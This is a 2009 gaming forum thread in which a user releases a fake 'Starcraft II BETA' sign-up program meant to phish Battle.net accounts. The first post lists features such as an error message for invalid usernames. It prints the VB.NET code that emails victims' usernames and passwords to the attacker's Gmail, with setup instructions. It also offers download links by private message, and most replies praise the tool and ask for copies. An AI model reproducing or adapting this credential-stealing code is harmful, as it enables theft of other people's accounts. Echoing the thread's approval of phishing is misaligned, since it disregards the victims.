[EPIC]Starcraft II BETA Phisher menu

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 18
  1. #1
    Dombo's Avatar Banned
    Reputation
    622
    Join Date
    Nov 2008
    Posts
    1,421
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [EPIC]Starcraft II BETA Phisher

    Hi guys

    Time for me to release another phisher!
    This time I though of making a phisher that would get alot of attention,
    a Starcraft II BETA, because alot of people want to be in it.

    So I started opening my Photoshop and shooped myself some images
    (some taken from the Starcraft II fanpack) and designed myself a GUI for
    my phisher.


    SCREENSHOT:



    Features:

    1. An error message when an invalid username is given
    2. An email with their account details mailed directly to your inbox
    3. Blizzlike interface (GUI)
    4. Drag-able window with custom shape
    5. Working Close, Minimize buttons
    6. VB.NET source code

    How to set it up?
    Code:
     Dim mail As New System.Net.Mail.MailMessage()
                        Dim SmtpServer As New Net.Mail.SmtpClient
                        SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "password")
                        SmtpServer.Port = 587
                        SmtpServer.Host = "smtp.gmail.com"
                        SmtpServer.EnableSsl = True
                        mail.To.Add("[email protected]")
                        mail.From = New Net.Mail.MailAddress("[email protected]")
                        mail.Subject = "New Battle.net Account! " & Date.Today
                        mail.Body = "Battle.net Account: " & Environment.NewLine & "-------------------------" & Environment.NewLine & "Username: " & txtUsername.Text & Environment.NewLine & "Password: " & txtPassword.Text & Environment.NewLine & "-------------------------"
                        SmtpServer.Send(mail)
                        MessageBox.Show("Thank you for participating in this BETA release!", "Done", MessageBoxButtons.OK)
    RED = Your gmail login
    YELLOW = Your gmail Password
    GREEN = Your hotmail address

    Download:

    PM me for a download link!


    ~Dombo
    Last edited by Dombo; 06-08-2009 at 10:23 AM.

    [EPIC]Starcraft II BETA Phisher
  2. #2
    Henessy's Avatar Contributor
    Reputation
    104
    Join Date
    Sep 2008
    Posts
    1,284
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This is Very nice, +Rep for the time and effort put into this program.

  3. #3
    [Blackstorm]'s Avatar Contributor
    Reputation
    101
    Join Date
    Oct 2007
    Posts
    424
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    very epic, wont be using it though but ive repped too many ppl already, geting back to u tomorrow


  4. #4
    Dombo's Avatar Banned
    Reputation
    622
    Join Date
    Nov 2008
    Posts
    1,421
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by jess~ View Post
    This is Very nice, +Rep for the time and effort put into this program.
    Much appreciated

  5. #5
    -Scooby-'s Avatar Banned
    Reputation
    264
    Join Date
    Nov 2007
    Posts
    538
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hey nice phisher dude your stuff is the shi- i always like it +Rep man

  6. #6
    jumboaffe's Avatar Active Member
    Reputation
    17
    Join Date
    Nov 2008
    Posts
    81
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'll try it out, looks amazing Great work, +rep

  7. #7
    Dombo's Avatar Banned
    Reputation
    622
    Join Date
    Nov 2008
    Posts
    1,421
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by -Scooby- View Post
    Hey nice phisher dude your stuff is the shi- i always like it +Rep man
    Thanks, but your phisher is just as good

  8. #8
    bone91's Avatar Sergeant Major
    Reputation
    91
    Join Date
    Feb 2008
    Posts
    156
    Thanks G/R
    17/9
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    wow n1.
    Nice GUI. Hope its good coded, too.

    +rep +pm out

    bye

  9. #9
    Thunderofnl's Avatar Elite User C# / Java / PHP Programmer
    Authenticator enabled
    Reputation
    491
    Join Date
    May 2008
    Posts
    1,032
    Thanks G/R
    20/20
    Trade Feedback
    6 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This is epic!
    +rep +PM!
    and again our date of birth is on the same date XD

  10. #10
    Dombo's Avatar Banned
    Reputation
    622
    Join Date
    Nov 2008
    Posts
    1,421
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    All download links were sent!
    Last edited by Dombo; 06-09-2009 at 05:11 AM.

  11. #11
    wtfpwntt's Avatar Member
    Reputation
    2
    Join Date
    May 2009
    Posts
    46
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Can't PM but would really like to try it out!

  12. #12
    Dombo's Avatar Banned
    Reputation
    622
    Join Date
    Nov 2008
    Posts
    1,421
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    More PMs sent out.

  13. #13
    opposite's Avatar Member
    Reputation
    17
    Join Date
    May 2009
    Posts
    53
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Looks like an awesome phisher - +rep & PM sent.

  14. #14
    malakas's Avatar Member
    Reputation
    2
    Join Date
    May 2007
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Great phisher mate thanks for your contribution.

  15. #15
    bigkingbulldog50's Avatar Active Member
    Reputation
    15
    Join Date
    Jan 2008
    Posts
    79
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    wow awesome thanks for the phisher

Page 1 of 2 12 LastLast

Similar Threads

  1. [EPIC][PHISHER] StarCraft II Beta Phisher
    By Bannersbomb in forum WoW Scam Prevention
    Replies: 15
    Last Post: 05-14-2009, 12:09 PM
  2. [Tanaxia Scams] WoTLK Opt-Beta Phisher
    By Tanax in forum WoW Scam Prevention
    Replies: 48
    Last Post: 11-17-2008, 06:32 AM
  3. [WIP] Epic WOTLK Beta phisher
    By neconide in forum WoW Scam Prevention
    Replies: 0
    Last Post: 09-07-2008, 12:34 AM
  4. [ Epic Thread! ] ~ WOTLK Beta: Sandbox Instance, City, ETC Coords! (Includes Strath)
    By I Hypnotoad I in forum World of Warcraft Emulator Servers
    Replies: 4
    Last Post: 07-23-2008, 02:21 PM
All times are GMT -5. The time now is 11:30 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search